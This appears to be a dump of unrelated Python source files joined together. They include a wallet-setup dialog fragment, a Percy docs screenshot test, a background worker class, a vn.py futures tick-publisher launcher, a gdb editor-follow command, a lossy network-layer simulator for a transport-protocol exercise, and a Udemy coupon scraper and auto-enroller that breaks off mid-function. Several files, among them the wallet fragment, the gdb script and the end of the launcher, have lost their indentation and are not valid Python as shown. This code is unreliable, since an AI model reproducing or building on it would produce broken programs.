"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_(MSG_BUTTON_CANCEL))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
network.auto_connect = (r == 0)
app_state.config.set_key('auto_connect', network.auto_connect, True)
if r == 1:
nlayout = NetworkChoiceLayout(network, app_state.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require %d signatures')%m)
cw.set_m(m)
def on_n(n):
n_label.setText(_('From %d cosigners')%n)
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock "
"funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
test_visual_regression.py | from http import server
import pathlib
import threading
import percy
from selenium import webdriver
from selenium.webdriver.firefox import options as firefox_options
BASE_DIR = pathlib.Path(__file__).parent.parent.resolve()
DOCS_BUILD_DIR = BASE_DIR / "docs/_build/html/"
class DocsHTTPRequestHandler(server.SimpleHTTPRequestHandler):
    """Request handler that serves files from the built docs directory."""

    def __init__(self, *args, **kwargs):
        # Pin the served directory to the docs build output rather than CWD.
        super().__init__(*args, directory=str(DOCS_BUILD_DIR), **kwargs)
def main():
    """Serve the built docs locally and capture Percy visual-regression
    snapshots of a fixed list of example pages."""
    if not DOCS_BUILD_DIR.exists():
        print(
            "No docs build directory found. "
            "Did you forget to build the development docs?"
        )
        exit(1)
    handler_class = DocsHTTPRequestHandler
    server_address = ('127.0.0.1', 8000)
    httpd = server.HTTPServer(server_address, handler_class)
    # Serve in a background thread so this process can drive the browser.
    server_thread = threading.Thread(target=httpd.serve_forever)
    server_thread.start()
    print("Server thread running. Starting client requests...")
    # Headless Firefox; presumably requires geckodriver on PATH -- confirm.
    options = firefox_options.Options()
    options.headless = True
    driver = webdriver.Firefox(options=options)

    def take_snapshot(url, title):
        # Load the page, give it up to 2s to settle, then upload to Percy.
        print(f"Taking snapshot of {title} at: {url}")
        driver.get(url)
        driver.implicitly_wait(2)
        percy.percy_snapshot(driver, title)

    # (url, snapshot title) pairs covering the documented example pages.
    pages = [
        ("http://localhost:8000", "Homepage"),
        ("http://localhost:8000/examples/admonitions.html", "Admonitions"),
        ("http://localhost:8000/examples/autodoc.html", "Autodoc"),
        ("http://localhost:8000/examples/code-blocks.html", "Code blocks"),
        ("http://localhost:8000/examples/headings.html", "Headings"),
        ("http://localhost:8000/examples/images.html", "Images"),
        ("http://localhost:8000/examples/links.html", "Links"),
        ("http://localhost:8000/examples/lists.html", "Lists"),
        ("http://localhost:8000/examples/paragraphs.html", "Paragraphs"),
        ("http://localhost:8000/examples/rst-page.html", "Restructured Text"),
    ]
    for page in pages:
        take_snapshot(page[0], page[1])
    driver.quit()
    print("Client done.")
    # Stop the background HTTP server; its thread then exits.
    httpd.shutdown()
    print("Server done.")

if __name__ == "__main__":
    main()
|
work.py | import threading
import time
class MyWork:
    """Background job that sums 0..maxvalue, reporting progress via callbacks.

    Intended for use from a GUI: `setprogress` and `setresult` are callbacks
    that post updates back to the GUI main loop.
    """

    def __init__(self, maxvalue, setprogress, setresult):
        '''maxvalue is given by the GUI
        setprogress/ setresult is a function. calling these functions will add an event to the main loop, and update the value.
        '''
        self.maxvalue = maxvalue
        self.setprogress = setprogress  # called with an int percentage 0..100
        self.setresult = setresult      # called once with the final sum
        self.interrupt = False          # set True to ask the worker to stop
        self.workstarted = False        # guards against double start

    def start(self):
        '''start working. if the application has started, then do nothing.'''
        # FIX: replaced the `if started: pass / else:` construct with a
        # guard clause; behaviour is unchanged.
        if self.workstarted:
            return
        self.workthread = threading.Thread(target=self.dowork)
        self.workthread.start()
        self.workstarted = True

    def stop(self):
        '''interrupt work: ask the worker thread to stop and wait for it.'''
        if self.workstarted:
            self.interrupt = True
            self.workthread.join()

    def dowork(self):
        '''calculate the data and report the result via the callbacks.'''
        print('work starts...')
        result = 0
        # FIX: guard against ZeroDivisionError when maxvalue == 0; the loop
        # still runs once (i == 0) and reports 0% progress and result 0.
        denom = self.maxvalue if self.maxvalue else 1
        for i in range(self.maxvalue + 1):
            result += i
            self.setprogress(int(100 * i / denom + 0.5))
            time.sleep(0.1)
            if self.interrupt:
                # Interrupted runs publish no result.
                print('work interrupted...')
                return
        self.setresult(result)
        print('work ends...')
|
run.py | # flake8: noqa
import os
import sys
import multiprocessing
from time import sleep
from datetime import datetime, time
from logging import INFO
# 将repostory的目录i,作为根目录,添加到系统环境中。
ROOT_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', '..'))
sys.path.append(ROOT_PATH)
print(f'append {ROOT_PATH} into sys.path')
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.index_tick_publisher import IndexTickPublisherApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
# Global logging configuration for the vn.py trader framework.
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True

# RabbitMQ connection settings for the index tick publisher.
# NOTE(review): name looks like a typo for "rabbit_setting"; kept as-is
# because run_child() references it by this name.
rebbit_setting = {
    "host": "192.168.1.211"
}
def run_child():
    """
    Running in the child process.

    Builds the vn.py main engine with a CTP gateway and the index tick
    publisher app, connects the publisher to RabbitMQ, then blocks forever
    (terminated externally by the parent process).
    """
    SETTINGS["log.file"] = True
    event_engine = EventEngine()
    main_engine = MainEngine(event_engine)
    main_engine.add_gateway(CtpGateway)
    publisher_engine = main_engine.add_app(IndexTickPublisherApp)
    main_engine.write_log("主引擎创建成功")
    log_engine = main_engine.get_engine("log")
    event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
    main_engine.write_log("注册日志事件监听")
    # Give the engines time to initialise before connecting.
    sleep(10)
    main_engine.write_log("启动连接tdx & rabbit")
    publisher_engine.connect(rebbit_setting)
    # Keep the process alive; the parent terminates it outside trading hours.
    while True:
        sleep(1)
def run_parent():
    """
    Running in the parent process.

    Supervises the child: starts it during Chinese futures trading hours
    (day and night sessions) and terminates it outside them, polling every
    5 seconds.
    """
    print("启动CTA策略守护父进程")
    # Chinese futures market trading period (day/night)
    # NOTE: `time` here is datetime.time (see imports), not the time module.
    DAY_START = time(8, 45)
    DAY_END = time(15, 30)
    NIGHT_START = time(20, 45)
    NIGHT_END = time(2, 45)  # the night session wraps past midnight
    child_process = None
    while True:
        current_time = datetime.now().time()
        trading = False
        # Check whether in trading period (night window is split across
        # midnight, hence the two separate comparisons).
        if (
            (current_time >= DAY_START and current_time <= DAY_END)
            or (current_time >= NIGHT_START)
            or (current_time <= NIGHT_END)
        ):
            trading = True
        # Start child process in trading period
        if trading and child_process is None:
            print("启动子进程")
            child_process = multiprocessing.Process(target=run_child)
            child_process.start()
            print("子进程启动成功")
        # Outside the trading window, terminate the child process.
        if not trading and child_process is not None:
            print("关闭子进程")
            child_process.terminate()
            child_process.join()
            child_process = None
            print("子进程关闭成功")
        sleep(5)
if __name__ == "__main__":
run_parent()
|
follow-editor.py | import gdb
from threading import Thread
from traceback import print_exc
from datetime import datetime
from os.path import isfile
import subprocess
class FollowEditor(gdb.Command):
@staticmethod
def printf(msg):
print("follow-editor: %s" % (msg,))
def __init__(self):
self.editor_command = "emacsclient -n +%L %F"
self.next_prompt_hook = gdb.prompt_hook
self.directories = {}
self.current_loc = (None, None)
self.enabled = False
gdb.prompt_hook = self.prompt_hook
super(FollowEditor, self).__init__("follow-editor", gdb.COMMAND_OBSCURE)
def run_editor_command(self, filename, line):
new_loc = (filename, line)
if self.current_loc == new_loc:
return
self.current_loc = new_loc
command = self.editor_command.replace("%L", str(line)).replace("%F", filename).replace("%%", "%")
#FollowEditor.printf("Trying to run %s" % command)
proc = subprocess.Popen(command, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def wait_for_editor():
proc.communicate()
proc.wait()
Thread(target=wait_for_editor).start()
def prompt_hook(self, gdb_instance):
try:
if self.enabled:
frame = gdb.selected_frame()
if frame:
sal = frame.find_sal()
if sal.symtab and sal.line:
filename = sal.symtab.fullname()
if filename and isfile(filename):
self.run_editor_command(filename, sal.line)
else:
FollowEditor.printf("No such file: %s" % filename)
except Exception as e:
string_err = str(e)
if string_err != "No frame is currently selected.":
print_exc(e)
finally:
if self.next_prompt_hook:
return self.next_prompt_hook()
def invoke(self, arg, from_tty):
argv = gdb.string_to_argv(arg)
command = None
if len(argv) > 0:
command = argv[0]
if command == "command":
try:
self.editor_command = argv[1]
except:
print("usage: follow-editor command <command>")
elif command == "on":
self.enabled = True
elif command == "off":
self.enabled = False
# elif command == "add-path-translation":
# if len(argv) == 3:
# dir_from = argv[1]
# dir_to = argv[2]
# self.directories[dir_from] = dir_to
# else:
# print("usage: follow-editor add-path-translation <from-path> <to-path>")
# elif command == "del-path-translation":
# if len(argv) == 2:
# dir_from = argv[1]
# if dir_from in self.directories:
# del self.directories[dir_from]
# else:
# FollowEditor.printf("Unknown directory: %s" % dir_from)
# else:
# print("usage: follow-editor del-path-translation <from-directory>")
elif command == "info" or command is None:
print("follow-editor configuration:")
print(" Editor command: %s" % (self.editor_command))
print(" Run editor command: %s" % ("on" if self.enabled else "off"))
# if len(self.directories):
# print(" Directory translations:")
# for k,v in self.directories:
# print(" %s -> %s" % (k,v))
else:
# print("Usage: follow-editor (command <command> | add-path-translation <from> <to> | del-path-translation <from> | info)")
print("Usage: follow-editor (command <command> | on | off | info)")
#print(dir(gdb))
# Instantiating the command object registers `follow-editor` with gdb.
FollowEditor()
|
Network.py | import argparse
import socket
import threading
from time import sleep
import random
import RDT
## Provides an abstraction for the network layer
class NetworkLayer:
    """Simulated unreliable byte channel over a localhost TCP connection.

    Randomly drops, corrupts, and reorders outgoing messages according to
    the probabilities below, for exercising an RDT protocol on top.
    """
    # configuration parameters
    prob_pkt_loss = 0        # probability an outgoing message is silently dropped
    prob_byte_corr = 0.2     # probability some bytes of a message are corrupted
    prob_pkt_reorder = 0     # probability a message is held back and reordered
    # class variables
    # NOTE(review): these are class attributes used as per-instance state;
    # __init__ rebinds most of them, but `lock` is genuinely shared across
    # all instances — confirm only one NetworkLayer exists per process.
    sock = None              # listening socket (server role only)
    conn = None              # connected data socket used for send/recv
    buffer_S = ''            # received characters not yet delivered upward
    lock = threading.Lock()  # guards buffer_S between collector and reader
    collect_thread = None    # background thread running collect()
    stop = None              # flag telling the collector thread to exit
    socket_timeout = 0.1     # recv timeout so the collector can poll `stop`
    reorder_msg_S = None     # message held back when simulating reordering

    def __init__(self, role_S, server_S, port):
        # The client connects out; the server binds localhost and blocks
        # until exactly one peer connects.
        if role_S == 'client':
            print('Network: role is client')
            self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.conn.connect((server_S, port))
            self.conn.settimeout(self.socket_timeout)
        elif role_S == 'server':
            print('Network: role is server')
            self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.sock.bind(('localhost', port))
            self.sock.listen(1)
            self.conn, addr = self.sock.accept()
            self.conn.settimeout(self.socket_timeout)
        # start the thread to receive data on the connection
        self.collect_thread = threading.Thread(name='Collector', target=self.collect)
        self.stop = False
        self.collect_thread.start()

    def disconnect(self):
        # Signal the collector thread to finish and wait for it to exit.
        if self.collect_thread:
            self.stop = True
            self.collect_thread.join()

    def __del__(self):
        if self.sock is not None: self.sock.close()
        if self.conn is not None: self.conn.close()

    def udt_send(self, msg_S):
        """Unreliably send msg_S: may drop, corrupt, or reorder it first."""
        # return without sending if the packet is being dropped
        if random.random() < self.prob_pkt_loss:
            return
        # corrupt a packet
        if random.random() < self.prob_byte_corr:
            start = random.randint(RDT.Packet.length_S_length,
                                   len(msg_S) - RDT.Packet.length_S_length)  # make sure we are not corrupting the length field,
            # since that makes life really difficult
            num = random.randint(1, 5)
            repl_S = ''.join(random.sample('XXXXX', num))  # sample length >= num
            msg_S = msg_S[:start] + repl_S + msg_S[min(start + num, len(msg_S)-1):]
        # reorder packets - either hold a packet back, or if one held back then send both
        if random.random() < self.prob_pkt_reorder or self.reorder_msg_S:
            if self.reorder_msg_S is None:
                self.reorder_msg_S = msg_S
                return None
            else:
                msg_S += self.reorder_msg_S
                self.reorder_msg_S = None
        # keep calling send until all the bytes are transferred
        totalsent = 0
        while totalsent < len(msg_S):
            # NOTE(review): `sent` counts bytes while msg_S is sliced by
            # characters — only equivalent while messages are pure ASCII;
            # confirm RDT never sends multi-byte characters.
            sent = self.conn.send(msg_S[totalsent:].encode('utf-8'))
            if sent == 0:
                raise RuntimeError("socket connection broken")
            totalsent = totalsent + sent

    ## Receive data from the network and save in internal buffer
    def collect(self):
        """Receive loop run by the collector thread; appends into buffer_S."""
        # print (threading.currentThread().getName() + ': Starting')
        while (True):
            try:
                recv_bytes = self.conn.recv(2048)
                with self.lock:
                    self.buffer_S += recv_bytes.decode('utf-8')
            # you may need to uncomment the BlockingIOError handling on Windows machines
            # except BlockingIOError as err:
            #     pass
            except socket.timeout as err:
                # timeout is expected — it lets us poll the stop flag below
                pass
            if self.stop:
                # print (threading.currentThread().getName() + ': Ending')
                return

    ## Deliver collected data to client
    def udt_receive(self):
        """Return everything received so far and clear the buffer."""
        with self.lock:
            ret_S = self.buffer_S
            self.buffer_S = ''
        return ret_S
if __name__ == '__main__':
    # Smoke test: run one process as `server` and another as `client`; each
    # sends a message, waits, prints whatever arrived, and disconnects.
    parser = argparse.ArgumentParser(description='Network layer implementation.')
    parser.add_argument('role', help='Role is either client or server.', choices=['client', 'server'])
    parser.add_argument('server', help='Server.')
    parser.add_argument('port', help='Port.', type=int)
    args = parser.parse_args()
    network = NetworkLayer(args.role, args.server, args.port)
    if args.role == 'client':
        network.udt_send('MSG_FROM_CLIENT')
        sleep(2)
        print(network.udt_receive())
        network.disconnect()
    else:
        sleep(1)
        print(network.udt_receive())
        network.udt_send('MSG_FROM_SERVER')
        network.disconnect()
|
duce.py | import json
import os
import random
import re
import sys
import threading
import time
import traceback
from decimal import Decimal
from urllib.parse import parse_qs, unquote, urlsplit
from webbrowser import open as web
import browser_cookie3
import cloudscraper
import PySimpleGUI as sg
import requests
from bs4 import BeautifulSoup as bs
from pack.base64 import *
# DUCE
# Global PySimpleGUI appearance setup (icon, theme, flat buttons).
sg.set_global_icon(icon)
sg.change_look_and_feel("dark")
# removed a stray no-op statement (`sg.theme_background_color` accessed the
# function object without calling it and discarded the result)
sg.set_options(
    button_color=(sg.theme_background_color(), sg.theme_background_color()),
    border_width=0,
    font=10,
)
############## Scraper
def discudemy():
    """Scrape "title|:|coupon-url" entries from discudemy.com into du_links."""
    global du_links
    du_links = []
    head = {
        "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    }
    cards = []
    # gather course cards from the first three listing pages
    for page in range(1, 4):
        listing = requests.get("https://www.discudemy.com/all/" + str(page), headers=head)
        page_soup = bs(listing.content, "html5lib")
        cards.extend(page_soup.find_all("a", {"class": "card-header"}))
        main_window["pDiscudemy"].update(page)
    main_window["pDiscudemy"].update(0, max=len(cards))
    # resolve each card's /go/ redirect page to the actual coupon link
    for position, card in enumerate(cards):
        main_window["pDiscudemy"].update(position + 1)
        slug = card["href"].split("/")[4]
        detail = requests.get("https://www.discudemy.com/go/" + slug, headers=head)
        detail_soup = bs(detail.content, "html5lib")
        du_links.append(card.string + "|:|" + detail_soup.find("a", id="couponLink").string)
    main_window["pDiscudemy"].update(0, visible=False)
    main_window["iDiscudemy"].update(visible=True)
def udemy_freebies():
    """Scrape "title|:|udemy-url" entries from udemyfreebies.com into uf_links."""
    global uf_links
    uf_links = []
    cards = []
    # gather course cards from the first two listing pages
    for page in range(1, 3):
        listing = requests.get(
            "https://www.udemyfreebies.com/free-udemy-courses/" + str(page)
        )
        page_soup = bs(listing.content, "html5lib")
        cards.extend(page_soup.find_all("a", {"class": "theme-img"}))
        main_window["pUdemy Freebies"].update(page)
    main_window["pUdemy Freebies"].update(0, max=len(cards))
    for position, card in enumerate(cards):
        main_window["pUdemy Freebies"].update(position + 1)
        # follow the site's /out/ redirector to the final udemy url
        final_url = requests.get(
            "https://www.udemyfreebies.com/out/" + card["href"].split("/")[4]
        ).url
        uf_links.append(card.img["alt"] + "|:|" + final_url)
    main_window["pUdemy Freebies"].update(0, visible=False)
    main_window["iUdemy Freebies"].update(visible=True)
def tutorialbar():
    """Scrape "title|:|udemy-url" entries from tutorialbar.com into tb_links."""
    global tb_links
    tb_links = []
    headings = []
    # gather course headings from the first three listing pages
    for page in range(1, 4):
        listing = requests.get("https://www.tutorialbar.com/all-courses/page/" + str(page))
        page_soup = bs(listing.content, "html5lib")
        headings.extend(
            page_soup.find_all(
                "h3", class_="mb15 mt0 font110 mobfont100 fontnormal lineheight20"
            )
        )
        main_window["pTutorial Bar"].update(page)
    main_window["pTutorial Bar"].update(0, max=len(headings))
    for position, heading in enumerate(headings):
        main_window["pTutorial Bar"].update(position + 1)
        detail = requests.get(heading.a["href"])
        detail_soup = bs(detail.content, "html5lib")
        offer_url = detail_soup.find("a", class_="btn_offer_block re_track_btn")["href"]
        # keep only offers that point directly at udemy.com
        if "www.udemy.com" in offer_url:
            tb_links.append(heading.a.string + "|:|" + offer_url)
    main_window["pTutorial Bar"].update(0, visible=False)
    main_window["iTutorial Bar"].update(visible=True)
def real_discount():
    """Scrape "title|:|udemy-url" entries from real.discount into rd_links."""
    global rd_links
    rd_links = []
    cards = []
    # gather course cards from the first two listing pages
    for page in range(1, 3):
        listing = requests.get("https://real.discount/stores/Udemy?page=" + str(page))
        page_soup = bs(listing.content, "html5lib")
        cards.extend(page_soup.find_all("div", class_="col-xl-4 col-md-6"))
        main_window["pReal Discount"].update(page)
    main_window["pReal Discount"].update(0, max=len(cards))
    for position, card in enumerate(cards):
        main_window["pReal Discount"].update(position + 1)
        detail = requests.get("https://real.discount" + card.a["href"])
        detail_soup = bs(detail.content, "html5lib")
        offer_url = detail_soup.find(
            "div", class_="col-xs-12 col-md-12 col-sm-12 text-center"
        ).a["href"]
        # linksynergy wraps the udemy url in the RD_PARM1 query parameter
        if offer_url.startswith("http://click.linksynergy.com"):
            offer_url = parse_qs(offer_url)["RD_PARM1"][0]
        rd_links.append(card.a.h3.string + "|:|" + offer_url)
    main_window["pReal Discount"].update(0, visible=False)
    main_window["iReal Discount"].update(visible=True)
def coursevania():
    """Scrape "title|:|udemy-url" entries from coursevania.com into cv_links."""
    global cv_links
    cv_links = []
    listing = requests.get("https://coursevania.com/courses/")
    listing_soup = bs(listing.content, "html5lib")
    # the ajax nonce lives inside an inline script mentioning "load_content"
    nonce_scripts = [
        script.string
        for script in listing_soup.find_all("script")
        if script.string and "load_content" in script.string
    ]
    nonce = json.loads(nonce_scripts[0].strip("_mlv = norsecat;\n"))["load_content"]
    grid = requests.get(
        "https://coursevania.com/wp-admin/admin-ajax.php?&template=courses/grid&args={%22posts_per_page%22:%2230%22}&action=stm_lms_load_content&nonce="
        + nonce
        + "&sort=date_high"
    ).json()
    grid_soup = bs(grid["content"], "html5lib")
    titles = grid_soup.find_all("div", {"class": "stm_lms_courses__single--title"})
    main_window["pCourse Vania"].update(0, max=len(titles))
    for position, entry in enumerate(titles):
        main_window["pCourse Vania"].update(position + 1)
        detail = requests.get(entry.a["href"])
        detail_soup = bs(detail.content, "html5lib")
        cv_links.append(
            entry.h5.string
            + "|:|"
            + detail_soup.find("div", {"class": "stm-lms-buy-buttons"}).a["href"]
        )
    main_window["pCourse Vania"].update(0, visible=False)
    main_window["iCourse Vania"].update(visible=True)
def idcoupons():
    """Scrape "title|:|udemy-url" entries from idownloadcoupon.com into idc_links."""
    global idc_links
    idc_links = []
    buttons = []
    # gather external-product buttons from the first five listing pages
    for page in range(1, 6):
        listing = requests.get(
            "https://idownloadcoupon.com/product-category/udemy-2/page/" + str(page)
        )
        page_soup = bs(listing.content, "html5lib")
        buttons.extend(
            page_soup.find_all("a", attrs={"class": "button product_type_external"})
        )
    main_window["pIDownloadCoupons"].update(0, max=len(buttons))
    for position, button in enumerate(buttons):
        main_window["pIDownloadCoupons"].update(position + 1)
        target = unquote(button["href"])
        # unwrap the affiliate redirectors down to the raw udemy url
        if target.startswith("https://ad.admitad.com"):
            target = parse_qs(target)["ulp"][0]
        elif target.startswith("https://click.linksynergy.com"):
            target = parse_qs(target)["murl"][0]
        idc_links.append(button["aria-label"] + "|:|" + target)
    main_window["pIDownloadCoupons"].update(0, visible=False)
    main_window["iIDownloadCoupons"].update(visible=True)
def enext() -> list:
    """Scrape "title|:|coupon-url" entries from e-next.in.

    Populates the module-level ``en_links`` list (read by name in main1(),
    like the other scrapers' globals) and also returns it.
    """
    # bug fix: en_links was a local variable, so main1() — which looks the
    # name up as a module global — never saw E-next's results.
    global en_links
    en_links = []
    r = requests.get("https://e-next.in/e/udemycoupons.php")
    soup = bs(r.content, "html5lib")
    big_all = soup.find("div", {"class": "scroll-box"}).find_all("p", {"class": "p2"})
    main_window["pE-next"].update(0, max=len(big_all))
    # bug fix: the original iterated `for i in big_all` but updated the
    # progress bar with an undefined `index`, raising NameError immediately.
    for index, i in enumerate(big_all):
        main_window["pE-next"].update(index + 1)
        title = i.text[11:].strip().removesuffix("Enroll Now free").strip()
        link = i.a["href"]
        en_links.append(title + "|:|" + link)
    main_window["pE-next"].update(0, visible=False)
    main_window["iE-next"].update(visible=True)
    return en_links
########################### Constants
version = "v1.6"  # current release tag; compared against GitHub in update_available()
def create_scrape_obj():
    """Return fresh daemon Thread objects, one per supported coupon site."""
    site_funcs = {
        "Discudemy": discudemy,
        "Udemy Freebies": udemy_freebies,
        "Tutorial Bar": tutorialbar,
        "Real Discount": real_discount,
        "Course Vania": coursevania,
        "IDownloadCoupons": idcoupons,
        "E-next": enext,
    }
    return {
        name: threading.Thread(target=func, daemon=True)
        for name, func in site_funcs.items()
    }
################
def cookiejar(
    client_id,
    access_token,
    csrf_token,
):
    """Build the cookie dict Udemy expects from the three auth tokens."""
    return {
        "client_id": client_id,
        "access_token": access_token,
        "csrf_token": csrf_token,
    }
def load_settings():
    """Load duce-gui-settings.json, backfilling keys added by newer versions.

    Falls back to the default settings file from the GitHub repo on first
    run.  Returns (settings, instructor_exclude, title_exclude), where the
    two exclude values are newline-joined strings for the GUI text boxes.
    """
    try:
        # migrate the pre-GUI settings filename, best effort
        os.rename("duce-settings.json", "duce-gui-settings.json")
    except OSError:
        # was a bare `except:`; only filesystem errors (file absent, not
        # replaceable) are expected and safe to ignore here
        pass
    try:
        with open("duce-gui-settings.json") as f:
            settings = json.load(f)
    except FileNotFoundError:
        # first run: fetch the default settings shipped in the repository
        settings = dict(
            requests.get(
                "https://raw.githubusercontent.com/techtanic/Discounted-Udemy-Course-Enroller/master/duce-gui-settings.json"
            ).json()
        )
    title_exclude = "\n".join(settings["title_exclude"])
    instructor_exclude = "\n".join(settings["instructor_exclude"])
    # keys introduced after the settings file format was first published
    settings.setdefault("save_txt", True)  # v1.3
    settings["sites"].setdefault("E-next", True)  # v1.4
    settings.setdefault("discounted_only", False)  # v1.4
    return settings, instructor_exclude, title_exclude
def save_settings():
    """Persist the module-level settings dict to duce-gui-settings.json."""
    with open("duce-gui-settings.json", "w") as out:
        json.dump(settings, out, indent=4)
def fetch_cookies():
    """Pull www.udemy.com cookies from the local browser via browser_cookie3.

    Returns (cookies_as_dict, raw_cookiejar).
    """
    jar = browser_cookie3.load(domain_name="www.udemy.com")
    return requests.utils.dict_from_cookiejar(jar), jar
def get_course_id(url):
    """Resolve a course landing-page URL to its numeric course id string.

    Returns False when the page redirects/404s (dead coupon page) or the
    URL is a draft course.
    """
    r = requests.get(url, allow_redirects=False)
    if r.status_code in (404, 302, 301):
        return False
    if "/course/draft/" in url:
        return False
    soup = bs(r.content, "html5lib")
    try:
        courseid = soup.find(
            "div",
            attrs={"data-content-group": "Landing Page"},
        )["data-course-id"]
    except (TypeError, KeyError):
        # was a bare `except:`; find() returning None (TypeError) or a
        # missing attribute (KeyError) means the old layout is absent —
        # fall back to the udlite landing-page marker
        courseid = soup.find(
            "body", attrs={"data-module-id": "course-landing-page/udlite"}
        )["data-clp-course-id"]
    return courseid
def get_course_coupon(url):
    """Extract the couponCode query parameter from url, or "" if absent."""
    params = parse_qs(urlsplit(url).query)
    try:
        # parse_qs maps each key to a list of values; take the first
        return params["couponCode"][0]
    except KeyError:
        # was a bare `except:`; only a missing parameter is expected here
        return ""
def affiliate_api(courseid):
    """Fetch category, language, recent rating, and instructor for a course.

    Uses the authenticated module-level session `s`.
    """
    data = s.get(
        "https://www.udemy.com/api-2.0/courses/"
        + courseid
        + "/?fields[course]=locale,primary_category,avg_rating_recent,visible_instructors",
    ).json()
    instructor_url = data["visible_instructors"][0]["url"]
    instructor = instructor_url.removeprefix("/user/").removesuffix("/")
    category = data["primary_category"]["title"]
    language = data["locale"]["simple_english_title"]
    rating = round(data["avg_rating_recent"], 1)
    return category, language, rating, instructor
def course_landing_api(courseid):
    """Return (purchase_date_or_False, list_price_as_Decimal) for a course.

    Uses the authenticated module-level session `s`.
    """
    r = s.get(
        "https://www.udemy.com/api-2.0/course-landing-components/"
        + courseid
        + "/me/?components=purchase"
    ).json()
    try:
        purchased = r["purchase"]["data"]["purchase_date"]
    except (KeyError, TypeError):
        purchased = False
    try:
        amount = r["purchase"]["data"]["list_price"]["amount"]
    except (KeyError, TypeError):
        # bug fix: the original printed the payload and then crashed with
        # UnboundLocalError because `amount` was never assigned; fall back
        # to 0 so the caller still gets a usable Decimal.
        print(r["purchase"]["data"])
        amount = 0
    return purchased, Decimal(amount)
def remove_duplicates(l):
    """Return l without duplicates, keeping the first occurrence of each item.

    The original implementation was O(n^2) — repeated list.count()/remove()
    while mutating the list being iterated.  dict.fromkeys preserves
    insertion order (guaranteed since Python 3.7) and does the same job in
    O(n); items must be hashable (they are "title|:|link" strings here).
    """
    return list(dict.fromkeys(l))
def update_courses():
    """Background worker: keep the enrolled-course count in the menu fresh.

    Runs forever on a daemon thread; polls Udemy's subscribed-courses API
    and rewrites the main window's menu with the current total.
    """
    while True:
        r = s.get("https://www.udemy.com/api-2.0/users/me/subscribed-courses/").json()
        new_menu = [
            ["Help", ["Support", "Github", "Discord"]],
            [f'Total Courses: {r["count"]}'],
        ]
        main_window["mn"].Update(menu_definition=new_menu)
        time.sleep(10)  # So that Udemy's api doesn't get spammed.
def update_available():
    """Compare this version against the latest GitHub release tag.

    Returns (login_window_title, main_window_title); the titles advertise
    an update when a newer release exists.
    """
    release_version = requests.get(
        "https://api.github.com/repos/techtanic/Discounted-Udemy-Course-Enroller/releases/latest"
    ).json()["tag_name"]

    def numeric(tag):
        # "v1.6" -> (1, 6); numeric comparison fixes the original string
        # comparison, which would claim "1.9" is newer than "1.10".
        return tuple(int(part) for part in tag.removeprefix("v").split("."))

    try:
        newer = numeric(version) < numeric(release_version)
    except ValueError:
        # non-numeric tag (unexpected) — fall back to the old string compare
        newer = version.removeprefix("v") < release_version.removeprefix("v")
    if newer:
        # also fixes the "Availabe" typo in the user-visible titles
        return (
            f" Update {release_version} Available",
            f"Update {release_version} Available",
        )
    else:
        return f"Login {version}", f"Discounted-Udemy-Course-Enroller {version}"
def manual_login():
    """Log in to Udemy with the email/password stored in settings.

    Retries once if Cloudflare raises a challenge.  Returns a 4-tuple
    (error_message, client_id, access_token, csrf_token); error_message
    is "" on success and the tokens are "" on failure.
    """
    for retry in range(0, 2):
        s = cloudscraper.CloudScraper()
        r = s.get(
            "https://www.udemy.com/join/signup-popup/",
        )
        soup = bs(r.text, "html5lib")
        # the login form requires the CSRF token embedded in the signup popup
        csrf_token = soup.find("input", {"name": "csrfmiddlewaretoken"})["value"]
        data = {
            "csrfmiddlewaretoken": csrf_token,
            "locale": "en_US",
            "email": settings["email"],
            "password": settings["password"],
        }
        s.headers.update({"Referer": "https://www.udemy.com/join/signup-popup/"})
        try:
            r = s.post(
                "https://www.udemy.com/join/login-popup/?locale=en_US",
                data=data,
                allow_redirects=False,
            )
        except cloudscraper.exceptions.CloudflareChallengeError:
            # challenged — retry once with a fresh scraper session
            continue
        # a 302 redirect means the credentials were accepted
        if r.status_code == 302:
            return "", r.cookies["client_id"], r.cookies["access_token"], csrf_token
        else:
            soup = bs(r.content, "html5lib")
            # NOTE(review): debug dump of the failed response body left in
            # by the author; consider removing before release
            with open("test.txt","w") as f:
                f.write(r.text)
            txt = soup.find(
                "div", class_="alert alert-danger js-error-alert"
            ).text.strip()
            # crude classification by the first letter of Udemy's error text
            if txt[0] == "Y":
                return "Too many logins per hour try later", "", "", ""
            elif txt[0] == "T":
